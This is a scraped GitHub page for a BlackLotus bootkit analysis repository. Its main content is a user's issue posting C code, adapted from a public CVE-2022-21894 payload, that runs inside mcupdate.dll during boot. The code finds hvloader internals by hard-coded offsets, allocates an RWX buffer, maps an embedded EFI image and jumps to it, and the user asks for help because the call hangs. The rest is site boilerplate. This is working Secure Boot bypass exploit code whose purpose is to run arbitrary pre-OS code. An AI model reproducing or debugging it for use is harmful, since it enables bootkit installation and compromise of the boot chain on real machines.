spiralbl0ck / blacklotus-analysis-stage2-bootkit-rootkit-stage Goto Github PK
View Code? Open in Web Editor NEWZ2A-BlackLotus Challenge stage 2 bootkit-rootkit analysis
blacklotus-analysis-stage2-bootkit-rootkit-stage's People
Contributors
Stargazers
Watchers
blacklotus-analysis-stage2-bootkit-rootkit-stage's Issues
How to call an efi from MCUPDATE.DLL
Hello Mr.,
Please take a look into this code: ref: https://github.com/ASkyeye/CVE-2022-21894-Payload/blob/master/main.c#L43
`#include <windows.h>
#include <winternl.h>
#define EFIAPI __cdecl
#define MEMCPY(Dest, Src, Length) for(UINT64 i = 0; i < (Length); i++) Dest[i] = Src[i];
//Defines taken from https://github.com/btbd/umap/
#define BL_MEMORY_TYPE_APPLICATION (0xE0000012)
#define BL_MEMORY_ATTRIBUTE_RWX (0x424000)
typedef enum E_EXECUTION_CONTEXT
{
ApplicationContext,
FirmwareContext
}EXECUTION_CONTEXT, * PEXECUTION_CONTEXT;
typedef DWORD64 EFI_STATUS;
typedef unsigned short CHAR16;
typedef void(EFIAPI* BLP_ARCH_SWITCH_CONTEXT)(EXECUTION_CONTEXT newContext);
typedef NTSTATUS(EFIAPI* BL_IMG_ALLOCATE_IMAGE_BUFFER)(PVOID* imageBuffer, INT64 imageSize, INT32 memoryType, INT32 attributes, INT32 unused, BOOLEAN flags);
typedef EFI_STATUS(EFIAPI* BOOT_ENTRY)(PVOID imageHandle, PVOID systemTable, BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext);
typedef EFI_STATUS(EFIAPI* print_entry)(PVOID SystemTable, CHAR16* String, ...);
BYTE efiApp[] = { 0x4D, 0x5A ,......}; // here was my hex code helloworld.efi
DWORD McUpdateEntry(PVOID* functionTableOut, PVOID* functionTableIn)
{
BOOT_ENTRY entry;
BL_IMG_ALLOCATE_IMAGE_BUFFER fpBlImgAllocateImageBuffer;
BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext;
PIMAGE_DOS_HEADER hvDosHeader, efiDosHeader = (PIMAGE_DOS_HEADER)efiApp;
PIMAGE_NT_HEADERS hvNtHeaders, efiNtHeaders = (PIMAGE_NT_HEADERS)(efiApp + efiDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER secHeader, section;
PBYTE imageBuffer = NULL, src, dest;
PVOID hvLoaderAddr, printProc, hvLoaderBase = NULL, efiSystemTable, efiImageHandle, printSystemTable;
DWORD64 imageSize = efiNtHeaders->OptionalHeader.SizeOfImage;
hvLoaderAddr = functionTableIn[3];
printProc = (PVOID)((DWORD_PTR)hvLoaderAddr + 0xAE48);
printSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderAddr + 0x11093C);
print_entry print = (print_entry)(printProc);
print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA1 :\n");
for (PBYTE searchAddr = printProc; searchAddr; searchAddr--)
{
if (searchAddr[0] == 'M' && searchAddr[1] == 'Z' && searchAddr[2] == 0x90 && searchAddr[4] == 0x03)
{
hvLoaderBase = searchAddr;
break;
}
}
if (!hvLoaderBase)
goto Done;
hvDosHeader = (PIMAGE_DOS_HEADER)hvLoaderBase;
hvNtHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hvLoaderBase + hvDosHeader->e_lfanew);
if (hvNtHeaders->OptionalHeader.CheckSum != 0xEC35E) //It's better to have one check too much than too few
goto Done;
fpBlImgAllocateImageBuffer = (BL_IMG_ALLOCATE_IMAGE_BUFFER)((DWORD_PTR)hvLoaderBase + 0x3CC0C);
fpBlpArchSwitchContext = (PVOID)((DWORD_PTR)hvLoaderBase + 0xC550);
efiImageHandle = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x113670);
efiSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x1136C8);
//2. Allocate 1:1 PA-VA buffer
if (!NT_SUCCESS(fpBlImgAllocateImageBuffer(&imageBuffer, imageSize, BL_MEMORY_TYPE_APPLICATION, BL_MEMORY_ATTRIBUTE_RWX, 0, 0b00000001)))
goto Done;
if (!imageBuffer)
goto Done;
//3. Copy headers
MEMCPY(imageBuffer, efiApp, efiNtHeaders->OptionalHeader.SizeOfHeaders);
//4. Map sections
secHeader = (PIMAGE_SECTION_HEADER)((UINT64)&efiNtHeaders->OptionalHeader + efiNtHeaders->FileHeader.SizeOfOptionalHeader);
for (WORD i = 0; i < efiNtHeaders->FileHeader.NumberOfSections; i++)
{
section = &secHeader[i];
if (section->SizeOfRawData)
{
dest = (PVOID)(imageBuffer + section->VirtualAddress);
src = (PVOID)(efiApp + section->PointerToRawData);
MEMCPY(dest, src, section->SizeOfRawData);
}
}
//5. Call entry point
if (efiNtHeaders->OptionalHeader.AddressOfEntryPoint)
{
/*
* We use a custom entry point to pass the address of BlpArchSwitchContext to our EFI application.
* Before it can call EFI services, it needs to call BlpArchSwitchContext with 'FirmwareContext' as argument (and revert this before returning).
*/
//fpBlpArchSwitchContext(0);
entry = (BOOT_ENTRY)(imageBuffer + efiNtHeaders->OptionalHeader.AddressOfEntryPoint);
print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA==2 :\n");
//fpBlpArchSwitchContext(1); ///when i tried to call this function fpBlpArchSwitchContext(1) it stuck
entry(efiImageHandle, efiSystemTable, fpBlpArchSwitchContext); // it is exit and not printing any text
}
Done:
while (1);
return 0;
}`
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.